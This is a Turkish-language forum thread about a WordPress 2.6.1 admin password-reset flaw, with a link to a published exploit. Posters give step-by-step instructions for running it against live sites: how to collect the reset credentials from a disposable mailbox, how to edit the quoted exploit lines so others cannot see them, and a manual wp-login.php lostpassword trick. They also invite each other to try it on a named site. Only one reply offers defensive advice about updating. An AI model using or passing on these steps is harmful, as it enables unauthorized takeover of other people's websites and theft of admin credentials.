Wordpress 2.6.1 Admin Şifre Resetleme Açığı
-
http://www.milw0rm.com/exploits/6421
exploit yukarda
exploiti çalıştırdıktan sonra hedef sitede parola sıfırlama denemsi yapılıp sıfırlanan parolayıda adminin mailine değil "wp@nospam.us" maline göndermektedir. biz wp@nospam.us adlı maile nasıl bakacağız derseniz www.nospamfor.us a giriyorsunuz boş satıra wp yazıyorsunuz yandaki seçenekte nospamfor.us seçilini kalsın view mail dediğiniz de mail kutusuna gidersiniz
diyeceksiniz ki iyide serdar ben deneyeceğim şifreyi yolayacağım omail kutusuna giren herkes görecek hatta bazı lavukarda armutpiş ağzıma düş yapacaklarolurmu böyle olmaz tabi bunuda 2 yolu var exploiti çalıştırdıktan sonra hemen mail kutsuna bakıp şifreyi öğrenip silmek veya exploitte ufak bir düzenleme yapacaksınızben exploiti inceledim oda şu şekil exploitte şu satırları bulun
$UA = "WordpressAdminTakeover";
$MBOX="wp".`ps|md5sum|head -c 8`;
$EMAIL=$MBOX@nospamfor.us;wp yazan yerideğiştirip sadece kendiniz bileceği bir şey yazın örneğin "tbtserdar" yaptıktan sonra exploiti kaydedin şifreler tbtserdar@nospamfor.us adlı maile gidecektir giriş yaparkende wp yerine tbtserdar yazarsınız bu kadar basit
bizzat denedim çaışıyor her sitede olmasata tutan büyükçoğunluk mevcuttur.
-
ulan wordpress tede böyle açık varsa babayı yedik, en güvenilir sistemdi gözümde,..
-
biriniz djalper.net de denesin :) güncellemiyom ben onu kurdum öyle kaldı :) evde gerçi kendimde denerimde :)
-
djalper.net te dahil nereye denesem "failed to find resetmail try raising the wait-time right above" diyor
-
wordpress 2.6.2 sürümü zaten çıkmıstı hacılar...güncelleyin.
acıkların buyuk cogunlugu genellikle pluginlerden kaynaklanıyor...php biliyorsanız rf,sql vsvs...acıkları kendiniz bularak kapatabilirsiniz ama bilmiyorsanız mumkun oldugunca az eklenti kullanın ve popüler olanları tercih edin.sürümünüz en güncel haliyle olsun.
-
hotboy bunu yazdı:
-----------------------------
djalper.net te dahil nereye denesem "failed to find resetmail try raising the wait-time right above" diyor
-----------------------------
öyle dese bile maili kontrol ettiğinde şifre ve kul adının geldiğinigöreceksin bana bir kaç tane denk geldi öyle dedi ama baktım gelmiş kull adı ve şifre :) -
http://www.milw0rm.com/exploits/6421 adresindeki exploid nasıl kullanılır kısa bir açıklama yapabilecek olan var mı acaba?
-
wp-login.php?action=lostpassword
buradaki açık o clombun üzerine yazma açıgı arama yapın kullanıcı adı sekmesine admin mail sekmesine sizin maillinizi yazın maillinize bakın şifre gelicektir
-
yani bu kodların tamamını kopyalayıp herhangi bir arama kutusundan arattırdıktan sonra lostpass yerinde gidip şifreyi yollatacağım?
-
evet site sonuna bunu eklersen eger açıgı kapamamışsa mail yerine kendi mailini yazarsan admin passı resetlenmiş halde sana gelir.